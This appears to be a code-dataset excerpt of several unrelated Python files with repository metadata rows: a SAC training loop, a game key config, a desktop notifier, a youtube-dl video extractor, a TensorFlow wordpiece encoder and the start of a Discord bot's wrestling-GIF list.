self.target_entropy = float(self.target_entropy)
if isinstance(self.ent_coef, str) and self.ent_coef.startswith("auto"):
init_value = 1.0
if "_" in self.ent_coef:
init_value = float(self.ent_coef.split("_")[1])
assert init_value > 0.0, "The initial value of ent_coef must be greater than 0"
self.log_ent_coef = th.log(th.ones(1, device=self.device) * init_value).requires_grad_(True)
self.ent_coef_optimizer = th.optim.Adam([self.log_ent_coef], lr=self.lr_schedule(1))
else:
self.ent_coef_tensor = th.tensor(float(self.ent_coef)).to(self.device)
def _create_aliases(self) -> None:
self.actor = self.policy.actor
self.critic = self.policy.critic
self.critic_target = self.policy.critic_target
def train(self, gradient_steps: int, batch_size: int = 64) -> None:
self.policy.set_training_mode(True)
optimizers = [self.actor.optimizer, self.critic.optimizer]
if self.ent_coef_optimizer is not None:
optimizers += [self.ent_coef_optimizer]
self._update_learning_rate(optimizers)
ent_coef_losses, ent_coefs = [], []
actor_losses, critic_losses = [], []
for gradient_step in range(gradient_steps):
replay_data = self.replay_buffer.sample(batch_size, env=self._vec_normalize_env)
if self.use_sde:
self.actor.reset_noise()
actions_pi, log_prob = self.actor.action_log_prob(replay_data.observations)
log_prob = log_prob.reshape(-1, 1)
ent_coef_loss = None
if self.ent_coef_optimizer is not None:
# see https://github.com/rail-berkeley/softlearning/issues/60
ent_coef = th.exp(self.log_ent_coef.detach())
ent_coef_loss = -(self.log_ent_coef * (log_prob + self.target_entropy).detach()).mean()
ent_coef_losses.append(ent_coef_loss.item())
else:
ent_coef = self.ent_coef_tensor
ent_coefs.append(ent_coef.item())
# Optimize entropy coefficient, also called
# entropy temperature or alpha in the paper
if ent_coef_loss is not None:
self.ent_coef_optimizer.zero_grad()
ent_coef_loss.backward()
self.ent_coef_optimizer.step()
with th.no_grad():
# Select action according to policy
next_actions, next_log_prob = self.actor.action_log_prob(replay_data.next_observations)
# Compute the next Q values: min over all critics targets
next_q_values = th.cat(self.critic_target(replay_data.next_observations, next_actions), dim=1)
next_q_values, _ = th.min(next_q_values, dim=1, keepdim=True)
# add entropy term
next_q_values = next_q_values - ent_coef * next_log_prob.reshape(-1, 1)
# td error + entropy term
target_q_values = replay_data.rewards + (1 - replay_data.dones) * self.gamma * next_q_values
# Get current Q-values estimates for each critic network
# using action from the replay buffer
current_q_values = self.critic(replay_data.observations, replay_data.actions)
# Compute critic loss
critic_loss = 0.5 * sum([F.mse_loss(current_q, target_q_values) for current_q in current_q_values])
critic_losses.append(critic_loss.item())
# Optimize the critic
self.critic.optimizer.zero_grad()
critic_loss.backward()
self.critic.optimizer.step()
# Compute actor loss
# Alternative: actor_loss = th.mean(log_prob - qf1_pi)
# Mean over all critic networks
q_values_pi = th.cat(self.critic.forward(replay_data.observations, actions_pi), dim=1)
min_qf_pi, _ = th.min(q_values_pi, dim=1, keepdim=True)
actor_loss = (ent_coef * log_prob - min_qf_pi).mean()
actor_losses.append(actor_loss.item())
# Optimize the actor
self.actor.optimizer.zero_grad()
actor_loss.backward()
self.actor.optimizer.step()
# Update target networks
if gradient_step % self.target_update_interval == 0:
polyak_update(self.critic.parameters(), self.critic_target.parameters(), self.tau)
self._n_updates += gradient_steps
self.logger.record("train/n_updates", self._n_updates, exclude="tensorboard")
self.logger.record("train/ent_coef", np.mean(ent_coefs))
self.logger.record("train/actor_loss", np.mean(actor_losses))
self.logger.record("train/critic_loss", np.mean(critic_losses))
if len(ent_coef_losses) > 0:
self.logger.record("train/ent_coef_loss", np.mean(ent_coef_losses))
def learn(
self,
total_timesteps: int,
callback: MaybeCallback = None,
log_interval: int = 4,
eval_env: Optional[GymEnv] = None,
eval_freq: int = -1,
n_eval_episodes: int = 5,
tb_log_name: str = "SAC",
eval_log_path: Optional[str] = None,
reset_num_timesteps: bool = True,
) -> OffPolicyAlgorithm:
return super(SAC, self).learn(
total_timesteps=total_timesteps,
callback=callback,
log_interval=log_interval,
eval_env=eval_env,
eval_freq=eval_freq,
n_eval_episodes=n_eval_episodes,
tb_log_name=tb_log_name,
eval_log_path=eval_log_path,
reset_num_timesteps=reset_num_timesteps,
)
def _excluded_save_params(self) -> List[str]:
return super(SAC, self)._excluded_save_params() + ["actor", "critic", "critic_target"]
def _get_torch_save_params(self) -> Tuple[List[str], List[str]]:
state_dicts = ["policy", "actor.optimizer", "critic.optimizer"]
if self.ent_coef_optimizer is not None:
saved_pytorch_variables = ["log_ent_coef"]
state_dicts.append("ent_coef_optimizer")
else:
saved_pytorch_variables = ["ent_coef_tensor"]
return state_dicts, saved_pytorch_variables
| true
| true
|
f7059d8c63468534c4d5a45f70eb14aa1a9ab387
| 1,065
|
py
|
Python
|
constants.py
|
ra101/Pose2Input-MKKE
|
11905d19fbc18acc8b577f41d3149013cca76aab
|
[
"MIT"
] | 2
|
2021-08-16T06:25:04.000Z
|
2021-08-17T01:28:53.000Z
|
constants.py
|
ra101/Pose2Input-MKKE
|
11905d19fbc18acc8b577f41d3149013cca76aab
|
[
"MIT"
] | null | null | null |
constants.py
|
ra101/Pose2Input-MKKE
|
11905d19fbc18acc8b577f41d3149013cca76aab
|
[
"MIT"
] | null | null | null |
# ./constants.py
import os
import enum
from dotenv import load_dotenv
load_dotenv()
@enum.unique
class InputConfig(enum.Enum):
'''
Config for the gameplay, Takes input from .env
Value should be something tha can be used by pyAutoGUI
If not available then, uses default input config (mine)
and Yes I use arrow keys, deal with it!
'''
DEFAULT = ''
UP = os.getenv('UP', 'up').lower()
DOWN = os.getenv('DOWN', 'down').lower()
LEFT = os.getenv('LEFT', 'left').lower()
RIGHT = os.getenv('RIGHT', 'right').lower()
FRONT_PUNCH = os.getenv('FRONT_PUNCH', 'a').lower()
BACK_PUNCH = os.getenv('BACK_PUNCH', 's').lower()
FRONT_KICK = os.getenv('FRONT_KICK', 'z').lower()
BACK_KICK = os.getenv('BACK_KICK', 'x').lower()
THROW = os.getenv('THROW', 'd').lower()
TAG = os.getenv('TAG', 'c').lower()
BLOCK = os.getenv('BLOCK', 'space').lower()
FLIP_STANCE = os.getenv('FLIP_STANCE', 'ctrlright').lower()
PAUSE = os.getenv('PAUSE', 'tab').lower()
BACK = os.getenv('BACK', 'backspace').lower()
| 30.428571
| 63
| 0.62723
|
import os
import enum
from dotenv import load_dotenv
load_dotenv()
@enum.unique
class InputConfig(enum.Enum):
DEFAULT = ''
UP = os.getenv('UP', 'up').lower()
DOWN = os.getenv('DOWN', 'down').lower()
LEFT = os.getenv('LEFT', 'left').lower()
RIGHT = os.getenv('RIGHT', 'right').lower()
FRONT_PUNCH = os.getenv('FRONT_PUNCH', 'a').lower()
BACK_PUNCH = os.getenv('BACK_PUNCH', 's').lower()
FRONT_KICK = os.getenv('FRONT_KICK', 'z').lower()
BACK_KICK = os.getenv('BACK_KICK', 'x').lower()
THROW = os.getenv('THROW', 'd').lower()
TAG = os.getenv('TAG', 'c').lower()
BLOCK = os.getenv('BLOCK', 'space').lower()
FLIP_STANCE = os.getenv('FLIP_STANCE', 'ctrlright').lower()
PAUSE = os.getenv('PAUSE', 'tab').lower()
BACK = os.getenv('BACK', 'backspace').lower()
| true
| true
|
f7059f70f021d953948645a9e129f288f86fa8ff
| 572
|
py
|
Python
|
src/airflow_actionproject/hooks/__init__.py
|
actionprojecteu/airflow-actionproject
|
6518e73e5709ebce927e0b463b5e36d80194491c
|
[
"MIT"
] | null | null | null |
src/airflow_actionproject/hooks/__init__.py
|
actionprojecteu/airflow-actionproject
|
6518e73e5709ebce927e0b463b5e36d80194491c
|
[
"MIT"
] | null | null | null |
src/airflow_actionproject/hooks/__init__.py
|
actionprojecteu/airflow-actionproject
|
6518e73e5709ebce927e0b463b5e36d80194491c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Copyright (c) 2021
#
# See the LICENSE file for details
# see the AUTHORS file for authors
# ----------------------------------------------------------------------
#--------------------
# System wide imports
# -------------------
# ---------------
# Airflow imports
# ---------------
#--------------
# local imports
# -------------
# -----------------------
# Module global variables
# -----------------------
# ----------------
# Module constants
# ----------------
| 19.724138
| 72
| 0.274476
| true
| true
|
|
f7059fa1462d4d297a6397aa32f4f05bb16f2d55
| 492
|
py
|
Python
|
Programs/Desktop_Notifier.py
|
Phinix403/Python
|
64dec2dfb47a966a603dcdf1c65b32a7e3184672
|
[
"MIT"
] | null | null | null |
Programs/Desktop_Notifier.py
|
Phinix403/Python
|
64dec2dfb47a966a603dcdf1c65b32a7e3184672
|
[
"MIT"
] | null | null | null |
Programs/Desktop_Notifier.py
|
Phinix403/Python
|
64dec2dfb47a966a603dcdf1c65b32a7e3184672
|
[
"MIT"
] | null | null | null |
# Install Notification Module - pip install notify2
import notify2
import time
import os
notify2.init('Notification')
icon_path = os.getcwd() + "/icon.ico"
def notiFunc():
noti = notify2.Notification("Welcome to Techix", "Techix is an Tech Dependent Youtube Channel, Please Subscribe to get more Videos Frequently.", icon=icon_path)
noti.set_urgency(notify2.URGENCY_NORMAL)
noti.show()
noti.set_timeout(15000)
time.sleep(120)
if __name__ == "__main__":
notiFunc()
| 25.894737
| 164
| 0.73374
|
import notify2
import time
import os
notify2.init('Notification')
icon_path = os.getcwd() + "/icon.ico"
def notiFunc():
noti = notify2.Notification("Welcome to Techix", "Techix is an Tech Dependent Youtube Channel, Please Subscribe to get more Videos Frequently.", icon=icon_path)
noti.set_urgency(notify2.URGENCY_NORMAL)
noti.show()
noti.set_timeout(15000)
time.sleep(120)
if __name__ == "__main__":
notiFunc()
| true
| true
|
f705a06c95a7d04645d3ccb50784ff444cc6e934
| 2,746
|
py
|
Python
|
youtube_dl/extractor/toypics.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 66,635
|
2019-03-10T21:34:18.000Z
|
2022-03-31T23:50:31.000Z
|
youtube_dl/extractor/toypics.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 10,936
|
2019-03-10T21:35:47.000Z
|
2022-03-31T23:46:52.000Z
|
youtube_dl/extractor/toypics.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 15,194
|
2019-03-10T21:09:27.000Z
|
2022-03-31T22:13:49.000Z
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
import re
class ToypicsIE(InfoExtractor):
IE_DESC = 'Toypics video'
_VALID_URL = r'https?://videos\.toypics\.net/view/(?P<id>[0-9]+)'
_TEST = {
'url': 'http://videos.toypics.net/view/514/chancebulged,-2-1/',
'md5': '16e806ad6d6f58079d210fe30985e08b',
'info_dict': {
'id': '514',
'ext': 'mp4',
'title': "Chance-Bulge'd, 2",
'age_limit': 18,
'uploader': 'kidsune',
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
formats = self._parse_html5_media_entries(
url, webpage, video_id)[0]['formats']
title = self._html_search_regex([
r'<h1[^>]+class=["\']view-video-title[^>]+>([^<]+)</h',
r'<title>([^<]+) - Toypics</title>',
], webpage, 'title')
uploader = self._html_search_regex(
r'More videos from <strong>([^<]+)</strong>', webpage, 'uploader',
fatal=False)
return {
'id': video_id,
'formats': formats,
'title': title,
'uploader': uploader,
'age_limit': 18,
}
class ToypicsUserIE(InfoExtractor):
IE_DESC = 'Toypics user profile'
_VALID_URL = r'https?://videos\.toypics\.net/(?!view)(?P<id>[^/?#&]+)'
_TEST = {
'url': 'http://videos.toypics.net/Mikey',
'info_dict': {
'id': 'Mikey',
},
'playlist_mincount': 19,
}
def _real_extract(self, url):
username = self._match_id(url)
profile_page = self._download_webpage(
url, username, note='Retrieving profile page')
video_count = int(self._search_regex(
r'public/">Public Videos \(([0-9]+)\)</a></li>', profile_page,
'video count'))
PAGE_SIZE = 8
urls = []
page_count = (video_count + PAGE_SIZE + 1) // PAGE_SIZE
for n in range(1, page_count + 1):
lpage_url = url + '/public/%d' % n
lpage = self._download_webpage(
lpage_url, username,
note='Downloading page %d/%d' % (n, page_count))
urls.extend(
re.findall(
r'<div[^>]+class=["\']preview[^>]+>\s*<a[^>]+href="(https?://videos\.toypics\.net/view/[^"]+)"',
lpage))
return {
'_type': 'playlist',
'id': username,
'entries': [{
'_type': 'url',
'url': eurl,
'ie_key': 'Toypics',
} for eurl in urls]
}
| 30.175824
| 116
| 0.499636
|
from __future__ import unicode_literals
from .common import InfoExtractor
import re
class ToypicsIE(InfoExtractor):
IE_DESC = 'Toypics video'
_VALID_URL = r'https?://videos\.toypics\.net/view/(?P<id>[0-9]+)'
_TEST = {
'url': 'http://videos.toypics.net/view/514/chancebulged,-2-1/',
'md5': '16e806ad6d6f58079d210fe30985e08b',
'info_dict': {
'id': '514',
'ext': 'mp4',
'title': "Chance-Bulge'd, 2",
'age_limit': 18,
'uploader': 'kidsune',
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
formats = self._parse_html5_media_entries(
url, webpage, video_id)[0]['formats']
title = self._html_search_regex([
r'<h1[^>]+class=["\']view-video-title[^>]+>([^<]+)</h',
r'<title>([^<]+) - Toypics</title>',
], webpage, 'title')
uploader = self._html_search_regex(
r'More videos from <strong>([^<]+)</strong>', webpage, 'uploader',
fatal=False)
return {
'id': video_id,
'formats': formats,
'title': title,
'uploader': uploader,
'age_limit': 18,
}
class ToypicsUserIE(InfoExtractor):
IE_DESC = 'Toypics user profile'
_VALID_URL = r'https?://videos\.toypics\.net/(?!view)(?P<id>[^/?#&]+)'
_TEST = {
'url': 'http://videos.toypics.net/Mikey',
'info_dict': {
'id': 'Mikey',
},
'playlist_mincount': 19,
}
def _real_extract(self, url):
username = self._match_id(url)
profile_page = self._download_webpage(
url, username, note='Retrieving profile page')
video_count = int(self._search_regex(
r'public/">Public Videos \(([0-9]+)\)</a></li>', profile_page,
'video count'))
PAGE_SIZE = 8
urls = []
page_count = (video_count + PAGE_SIZE + 1) // PAGE_SIZE
for n in range(1, page_count + 1):
lpage_url = url + '/public/%d' % n
lpage = self._download_webpage(
lpage_url, username,
note='Downloading page %d/%d' % (n, page_count))
urls.extend(
re.findall(
r'<div[^>]+class=["\']preview[^>]+>\s*<a[^>]+href="(https?://videos\.toypics\.net/view/[^"]+)"',
lpage))
return {
'_type': 'playlist',
'id': username,
'entries': [{
'_type': 'url',
'url': eurl,
'ie_key': 'Toypics',
} for eurl in urls]
}
| true
| true
|
f705a0bdf5f2e9c98e441ea76e922c6518a8fec9
| 6,654
|
py
|
Python
|
lingvo/core/wpm_encoder.py
|
pizzahan/lingvo
|
9b85b7ba5d037701302efa807841c05223bc7d1d
|
[
"Apache-2.0"
] | 4
|
2019-06-08T00:19:06.000Z
|
2020-08-03T16:28:53.000Z
|
lingvo/core/wpm_encoder.py
|
pizzahan/lingvo
|
9b85b7ba5d037701302efa807841c05223bc7d1d
|
[
"Apache-2.0"
] | null | null | null |
lingvo/core/wpm_encoder.py
|
pizzahan/lingvo
|
9b85b7ba5d037701302efa807841c05223bc7d1d
|
[
"Apache-2.0"
] | 5
|
2018-12-11T08:05:16.000Z
|
2020-05-30T03:40:13.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Encode using wordpiece models.
Implements the segmentation algorithm described in the last paragraph of
p. 5150, in the following publication:
M. Schuster and K. Nakajima, "Japanese and Korean voice
search," 2012 IEEE International Conference on Acoustics,
Speech and Signal Processing, 2012
https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/37842.pdf
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
from lingvo.core.ops import py_x_ops
# Must be a large ID.
NO_TOKEN = 1 << 31 - 1
NO_TOKEN_STRING = '<unk>'
SENTENCE_START_STRING = '<s>'
SENTENCE_END_STRING = '</s>'
BOW_STR = '▁'
class WpmEncoder(object):
def __init__(self, wpm_filepath, merge_prob=1.):
"""Create a WPM encoder.
Args:
wpm_filepath: a path to the file containing the vocabulary.
merge_prob: the probability of merging tokens while encoding.
"""
# Load vocabulary file.
self._pieces = []
with tf.gfile.Open(wpm_filepath, 'r') as f:
for line in f.readlines():
line = line.decode('utf-8')
piece = line.strip().split('\t')[0]
self._pieces.append(piece)
self._merge_prob = merge_prob
def _TokenToString(self, token):
return py_x_ops.vocab_id_to_token(token, vocab=self._pieces)
def _StringToToken(self, tokstr):
return tf.where(
py_x_ops.token_in_vocab(tokstr, vocab=self._pieces),
py_x_ops.vocab_token_to_id(tokstr, vocab=self._pieces),
tf.broadcast_to(NO_TOKEN, tf.shape(tokstr)))
def _MergeTokens(self, tokens):
return self._StringToToken(
self._TokenToString(tokens[0]) + self._TokenToString(tokens[1]))
def _EncodeToIds(self, word):
# Below:
# * a token is a wordpiece ID.
# * the tokens array will be merged in-place.
# * the candidates array is an array of size len(tokens) - 1.
# It contains the token for the merged wordpiece, if it exists,
# -1 otherwise. For instance, candidate[3] = id(token[3] + token[4]).
# First, split into basic UTF-8 characters (letters).
chars = tf.strings.unicode_split(word, 'UTF-8')
tokens = self._StringToToken(chars)
tokens = tf.where(
tf.equal(tokens, NO_TOKEN),
# Unseen character.
tf.broadcast_to(self.unk_id, tf.shape(tokens)),
tokens)
# Create initial candidate list.
candidates = tf.map_fn(
self._MergeTokens, (tokens[:-1], tokens[1:]), dtype=tokens.dtype)
def _ShouldMerge(unused_tokens, candidates):
"""Merge until not possible, or we abort early according to merge_prob."""
return tf.logical_and(
tf.reduce_any(tf.not_equal(candidates, NO_TOKEN)),
tf.random.uniform([]) < self._merge_prob)
def _MergeOneToken(tokens, i):
return tf.expand_dims(
self._MergeTokens((tokens[i], tokens[i + 1])), axis=-1)
def _MergeCandidates(tokens, candidates):
"""Merge in the reverse binary tree."""
best_id = tf.argmin(candidates, output_type=tf.int32)
# Perform the merge at position best_id.
tokens = tf.concat(
[tokens[:best_id], [candidates[best_id]], tokens[best_id + 2:]],
axis=0)
# Recompute the merge candidates.
# Only the neighbors of best_id need to be recomputed.
empty = tf.zeros([0], dtype=candidates.dtype)
def _MergeLeft():
return tf.concat(
[candidates[:best_id - 1],
_MergeOneToken(tokens, best_id - 1)],
axis=0)
left_candidates = tf.cond(tf.equal(best_id, 0), lambda: empty, _MergeLeft)
def _MergeRight():
return tf.concat(
[_MergeOneToken(tokens, best_id), candidates[best_id + 2:]], axis=0)
right_candidates = tf.cond(
tf.greater_equal(best_id,
tf.size(tokens) - 1), lambda: empty, _MergeRight)
candidates = tf.concat([left_candidates, right_candidates], axis=0)
return tokens, candidates
return tf.while_loop(
_ShouldMerge,
_MergeCandidates, (tokens, candidates),
parallel_iterations=1,
back_prop=False)[0]
def Encode(self, text):
"""Converts string `text` to integer ids and the encoded string.
Encoding includes prefixing the beginning-of-word token to each word.
Returns:
ids: the encoded integer ids.
tokens: the encoded string.
"""
words = tf.sparse.to_dense(tf.strings.split([text]), default_value='')[0]
num_words = tf.size(words)
ids_ta = tf.TensorArray(tf.int32, 0, dynamic_size=True)
def _WordsToIds(i, words, ids_ta):
encoded_ids = self._EncodeToIds(BOW_STR + words[i])
ids_ta = ids_ta.scatter(
tf.range(ids_ta.size(),
ids_ta.size() + tf.size(encoded_ids)), encoded_ids)
return i + 1, words, ids_ta
_, _, ids_ta = tf.while_loop(
lambda i, *_: i < num_words,
_WordsToIds,
loop_vars=(tf.constant(0, tf.int32), words, ids_ta),
parallel_iterations=30,
back_prop=False)
ids = ids_ta.stack()
return ids, self._TokenToString(ids)
def Decode(self, ids):
txt = tf.strings.reduce_join(self._TokenToString(ids))
txt = tf.strings.regex_replace(txt, BOW_STR, ' ')
# Note that this strips spaces from the end of the input as well.
# We assume no inputs rely on the existence of trailing whitespace.
txt = tf.strings.strip(txt)
return txt
@property
def sentence_start_id(self):
return self._pieces.index(SENTENCE_START_STRING)
@property
def sentence_start_string(self):
return SENTENCE_START_STRING
@property
def sentence_end_id(self):
return self._pieces.index(SENTENCE_END_STRING)
@property
def sentence_end_string(self):
return SENTENCE_END_STRING
@property
def unk_id(self):
return self._pieces.index(NO_TOKEN_STRING)
| 33.104478
| 89
| 0.666366
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
from lingvo.core.ops import py_x_ops
NO_TOKEN = 1 << 31 - 1
NO_TOKEN_STRING = '<unk>'
SENTENCE_START_STRING = '<s>'
SENTENCE_END_STRING = '</s>'
BOW_STR = '▁'
class WpmEncoder(object):
def __init__(self, wpm_filepath, merge_prob=1.):
self._pieces = []
with tf.gfile.Open(wpm_filepath, 'r') as f:
for line in f.readlines():
line = line.decode('utf-8')
piece = line.strip().split('\t')[0]
self._pieces.append(piece)
self._merge_prob = merge_prob
def _TokenToString(self, token):
return py_x_ops.vocab_id_to_token(token, vocab=self._pieces)
def _StringToToken(self, tokstr):
return tf.where(
py_x_ops.token_in_vocab(tokstr, vocab=self._pieces),
py_x_ops.vocab_token_to_id(tokstr, vocab=self._pieces),
tf.broadcast_to(NO_TOKEN, tf.shape(tokstr)))
def _MergeTokens(self, tokens):
return self._StringToToken(
self._TokenToString(tokens[0]) + self._TokenToString(tokens[1]))
def _EncodeToIds(self, word):
chars = tf.strings.unicode_split(word, 'UTF-8')
tokens = self._StringToToken(chars)
tokens = tf.where(
tf.equal(tokens, NO_TOKEN),
tf.broadcast_to(self.unk_id, tf.shape(tokens)),
tokens)
candidates = tf.map_fn(
self._MergeTokens, (tokens[:-1], tokens[1:]), dtype=tokens.dtype)
def _ShouldMerge(unused_tokens, candidates):
return tf.logical_and(
tf.reduce_any(tf.not_equal(candidates, NO_TOKEN)),
tf.random.uniform([]) < self._merge_prob)
def _MergeOneToken(tokens, i):
return tf.expand_dims(
self._MergeTokens((tokens[i], tokens[i + 1])), axis=-1)
def _MergeCandidates(tokens, candidates):
best_id = tf.argmin(candidates, output_type=tf.int32)
tokens = tf.concat(
[tokens[:best_id], [candidates[best_id]], tokens[best_id + 2:]],
axis=0)
empty = tf.zeros([0], dtype=candidates.dtype)
def _MergeLeft():
return tf.concat(
[candidates[:best_id - 1],
_MergeOneToken(tokens, best_id - 1)],
axis=0)
left_candidates = tf.cond(tf.equal(best_id, 0), lambda: empty, _MergeLeft)
def _MergeRight():
return tf.concat(
[_MergeOneToken(tokens, best_id), candidates[best_id + 2:]], axis=0)
right_candidates = tf.cond(
tf.greater_equal(best_id,
tf.size(tokens) - 1), lambda: empty, _MergeRight)
candidates = tf.concat([left_candidates, right_candidates], axis=0)
return tokens, candidates
return tf.while_loop(
_ShouldMerge,
_MergeCandidates, (tokens, candidates),
parallel_iterations=1,
back_prop=False)[0]
def Encode(self, text):
words = tf.sparse.to_dense(tf.strings.split([text]), default_value='')[0]
num_words = tf.size(words)
ids_ta = tf.TensorArray(tf.int32, 0, dynamic_size=True)
def _WordsToIds(i, words, ids_ta):
encoded_ids = self._EncodeToIds(BOW_STR + words[i])
ids_ta = ids_ta.scatter(
tf.range(ids_ta.size(),
ids_ta.size() + tf.size(encoded_ids)), encoded_ids)
return i + 1, words, ids_ta
_, _, ids_ta = tf.while_loop(
lambda i, *_: i < num_words,
_WordsToIds,
loop_vars=(tf.constant(0, tf.int32), words, ids_ta),
parallel_iterations=30,
back_prop=False)
ids = ids_ta.stack()
return ids, self._TokenToString(ids)
def Decode(self, ids):
txt = tf.strings.reduce_join(self._TokenToString(ids))
txt = tf.strings.regex_replace(txt, BOW_STR, ' ')
txt = tf.strings.strip(txt)
return txt
@property
def sentence_start_id(self):
return self._pieces.index(SENTENCE_START_STRING)
@property
def sentence_start_string(self):
return SENTENCE_START_STRING
@property
def sentence_end_id(self):
return self._pieces.index(SENTENCE_END_STRING)
@property
def sentence_end_string(self):
return SENTENCE_END_STRING
@property
def unk_id(self):
return self._pieces.index(NO_TOKEN_STRING)
| true
| true
|
f705a1659e4db8d71a128447488a338279e58453
| 10,720
|
py
|
Python
|
cogs/gachiGASM.py
|
s0hvaperuna/Not-a-bot
|
933ae57e70a5c98fed6800205595af21bbf1a10e
|
[
"MIT"
] | 4
|
2017-03-08T13:38:43.000Z
|
2018-08-03T13:42:17.000Z
|
cogs/gachiGASM.py
|
s0hvaperuna/Not-a-bot
|
933ae57e70a5c98fed6800205595af21bbf1a10e
|
[
"MIT"
] | 3
|
2018-08-03T13:14:25.000Z
|
2018-10-02T16:22:04.000Z
|
cogs/gachiGASM.py
|
s0hvaperuna/Not-a-bot
|
933ae57e70a5c98fed6800205595af21bbf1a10e
|
[
"MIT"
] | 4
|
2017-04-08T23:22:00.000Z
|
2018-10-01T12:15:36.000Z
|
import logging
import os
import traceback
from datetime import datetime, time, timezone
from random import Random, choice
import disnake
from disnake.ext import tasks
from disnake.ext.commands import BucketType, cooldown, guild_only
from bot.bot import command, group, has_permissions
from bot.globals import PLAYLISTS
from cogs.cog import Cog
from utils.utilities import read_lines
logger = logging.getLogger('terminal')
class WrestlingGif:
def __init__(self, url, text):
self.url = url
self.text = text
def build_embed(self, author, recipient):
description = self.text.format(author=author, recipient=recipient)
embed = disnake.Embed(description=description)
embed.set_image(url=self.url)
return embed
wrestling_gifs = [
WrestlingGif('https://i.imgur.com/xUi2Vq1.gif', "**{recipient.name}** tries to grab but it fails. **{author.name}** grabs **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/osDWTHG.gif', "**{recipient.name}** tries to escape but **{author.name}** pins them down"),
WrestlingGif('https://i.imgur.com/HS6R463.gif', "**{author.name}** lifts **{recipient.name}** up. **{recipient.name}** is powerless to do anything"),
WrestlingGif('https://i.imgur.com/jbE2XVt.gif', "**{author.name}** challenges **{recipient.name}** to a friendly wrestling match"),
WrestlingGif('https://i.imgur.com/XVUjH9x.gif', "**{recipient.name}** tries to attack but **{author.name}** counters"),
WrestlingGif('https://i.imgur.com/vTeoYAE.gif', "**{author.name}** and **{recipient.name}** engage in a battle of strength"),
WrestlingGif('https://i.imgur.com/iu2kiVy.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/BulkVW1.gif', "**{author.name}** gets **{recipient.name}** with a knee strike"),
WrestlingGif('https://i.imgur.com/zXaIYLp.gif', "**{author.name}** beats **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/XNOMUcg.gif', "**{author.name}** delivers a low blow to **{recipient.name}**. Nasty strategy"),
WrestlingGif('https://i.imgur.com/oSG0V6a.gif', "**{recipient.name}** gets beaten by **{author.name}**"),
WrestlingGif('https://i.imgur.com/u0H0ZSA.gif', "**{author.name}** grabs **{recipient.name}**s fucking pants <:GWjojoGachiGASM:363025405562585088>"),
WrestlingGif('https://i.imgur.com/VFruiTR.gif', "**{author.name}** flexes on **{recipient.name}** after kicking their ass. WOO"),
WrestlingGif('https://i.imgur.com/YCd1aSo.gif', "**{author.name}** beats **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/M3sAu23.gif', "**{author.name}** chokes **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/inEROy3.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
WrestlingGif('https://i.imgur.com/8qI8f1M.gif', "**{author.name}** battles **{recipient.name}** in a feat of pure strength"),
WrestlingGif('https://i.imgur.com/xhVIjIt.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/RW07zr0.gif', "**{author.name}** escapes the choke of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/g6wVGpG.gif', "**{author.name}** escapes **{recipient.name}**s grab and begins a counter-attack"),
WrestlingGif('https://i.imgur.com/LKHtUeo.gif', "**{author.name}** gets a hold of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/eCCAKoA.gif', "It's time to wrestle"),
WrestlingGif('https://i.imgur.com/ZFiT5Ew.gif', "**{author.name}** lifts **{recipient.name}** up"),
WrestlingGif('https://i.imgur.com/A4Oo0Tp.gif', "**{author.name}** puts **{recipient.name}** down"),
WrestlingGif('https://i.imgur.com/COQlI5t.gif', "**{author.name}** swaps positions with **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/pIaErDy.gif', "**{author.name}** pulls **{recipient.name}**s arms"),
WrestlingGif('https://i.imgur.com/hThhSrl.gif', "**{author.name}** locks **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/goMZvRE.gif', "**{author.name}** turns the tables on **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/3A9eMu0.gif', "**{author.name}** slams **{recipient.name}** on the floor"),
WrestlingGif('https://i.imgur.com/G9Iklxu.gif', "**{author.name}** and **{recipient.name}** are in the middle of an intense battle"),
WrestlingGif('https://i.imgur.com/c1CQBnJ.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/cKcOJo0.gif', "**{author.name}** pulls **{recipient.name}**s leg"),
WrestlingGif('https://i.imgur.com/Q41oEne.gif', "**{recipient.name}** gets elbow struck by **{author.name}**"),
WrestlingGif('https://i.imgur.com/AP7MRnF.gif', "**{author.name}** escapes the hold of **{recipient.name}** and is ready for more"),
WrestlingGif('https://i.imgur.com/6khggL1.gif', "**{author.name}** pulls the hair of **{recipient.name}**"),
WrestlingGif('https://i.imgur.com/bq0Bjbl.gif', "**{author.name}** got the moves"),
WrestlingGif('https://i.imgur.com/aIVoytr.gif', "**{author.name}** throws **{recipient.name}** on the ground"),
